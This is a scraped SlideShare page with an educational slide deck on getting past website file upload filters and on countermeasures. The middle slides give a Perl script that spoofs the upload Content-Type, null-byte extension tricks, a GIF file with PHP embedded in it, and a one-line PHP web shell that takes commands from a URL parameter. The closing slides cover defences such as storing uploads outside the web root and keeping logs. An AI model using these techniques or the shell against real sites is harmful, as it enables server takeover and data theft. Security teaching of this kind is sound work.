0
BYPASS FILE UPLOAD RESTRICTIONS
ON WEBSITES
AND SECURITY MEASURES
By K. Subramanian
K. R. Mukesh
File upload
• Necessity
• Social networking websites, blogs, File
sharing, etc.
• Web developers do not consider the threa...
Methods of filtering
Content-Type verification
• HTTP POST – MIME type
Content-Disposition: form-data;
name="uploaded file []";filename="18.jpg...
An easy way – Tamper data
• Tamper data – Mozilla add-on allows to
modify the POST data before submit
Filename extension verification
• Check the extension of the file
• Filter out malicious extensions
$blacklist = array(".p...
File content verification
• Applicable to image files
• $imageinfo =getimagesize($_FILES['userfile']['tmp_name']);
• To by...
A Simple Demonstration
Towards Bypassing these Filters
Worst case scenario
• Local file inclusion – PHP shell upload
• Simple PHP shell:
<?php System ($_GET [‘command’]);?>
• Ex...
Security Measures
• Preventing direct access to the uploaded files
$uploaddir = '/var/spool/uploads/';
# Outside of root
•...
Random file name implementation
• Prevents attacker knowing the name of the
file uploaded
• Map the names in the database
...
Conclusion
• Complicated to implement a secure file
upload facility
• Many filters = slow response. Leads to Denial
Of Ser...
Thank you
Bypass file upload restrictions
Upcoming SlideShare
Loading in...5
×

Bypass file upload restrictions

13,272

Published on

Bypass file upload restrictions

Published in: Education, Technology
1 Comment
4 Likes
Statistics
Notes
No Downloads
Views
Total Views
13,272
On Slideshare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
88
Comments
1
Likes
4
Embeds 0
No embeds

No notes for slide

Transcript of "Bypass file upload restrictions"

  1. 1. BYPASS FILE UPLOAD RESTRICTIONS ON WEBSITES AND SECURITY MEASURES By K. Subramanian K. R. Mukesh
  2. 2. File upload • Necessity • Social networking websites, blogs, File sharing, etc. • Web developers do not consider the threats • Files should be sanitized • If not, leads to local file inclusion and hacking • Filtering mechanisms
  3. 3. Methods of filtering
  4. 4. Content-Type verification • HTTP POST – MIME type Content-Disposition: form-data; name="uploaded file []";filename="18.jpg"rn Content-Type : image/jpegrnr <file content> • To bypass this filter, edit the Content-Type to an applicable one. #!/usr/bin/perl # use LWP; use HTTP::Request::Common; $ua = $ua = LWP::UserAgent->new;; $req = $ua->request(POST 'http://example.com/upload.PHP', Content_Type => 'form-data', Content => [ userfile => ["sh.PHP", "sh.PHP", "Content-Type" => "application/pdf"], ], ); print $req->as_string();
  5. 5. An easy way – Tamper data • Tamper data – Mozilla add-on allows to modify the POST data before submit
  6. 6. Filename extension verification • Check the extension of the file • Filter out malicious extensions $blacklist = array(".php", ".phtml", ".php3", ".php4"); • To bypass this, use NULL BYTES in filename sh.php%00.pdf (or) sh.asp;xx.pdf • While uploading, extension is .pdf • When accessed, delivered to PHP interpreter
  7. 7. File content verification • Applicable to image files • $imageinfo =getimagesize($_FILES['userfile']['tmp_name']); • To bypass this, manually craft an image file with an embedded PHP code Content-Type: image/gif GIF89a(...some binary data...)<?PHP System($_GET[‘command’]);?> (....binary data…) • PHP interpreter execute the php code inside a garbage of binary values
  8. 8. A Simple Demonstration Towards Bypassing these Filters
  9. 9. Worst case scenario • Local file inclusion – PHP shell upload • Simple PHP shell: <?php System ($_GET [‘command’]);?> • Executes commands on remote server www.example.com/uploads/sh.php?command=‘ifconfig’ • Entire control of the server – rooting it • Defacements, database access, credential information theft, etc.
  10. 10. Security Measures • Preventing direct access to the uploaded files $uploaddir = '/var/spool/uploads/'; # Outside of root • Block web access using .htaccess file IndexIgnore */* • Overhead to read and write • Sometimes leads to potential directory traversal attacks
  11. 11. Random file name implementation • Prevents attacker knowing the name of the file uploaded • Map the names in the database $res = $db->query("INSERT INTO uploads SET name=?,original_name=?”) • Query while reading • A little overhead, but secure • Think again, leads to SQL injection
  12. 12. Conclusion • Complicated to implement a secure file upload facility • Many filters = slow response. Leads to Denial Of Service (DOS) attacks • Best way is to maintain UPLOAD LOGS containing user info like ip address, helpful to trace an attacker • Secure coding practices
  13. 13. Thank you
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×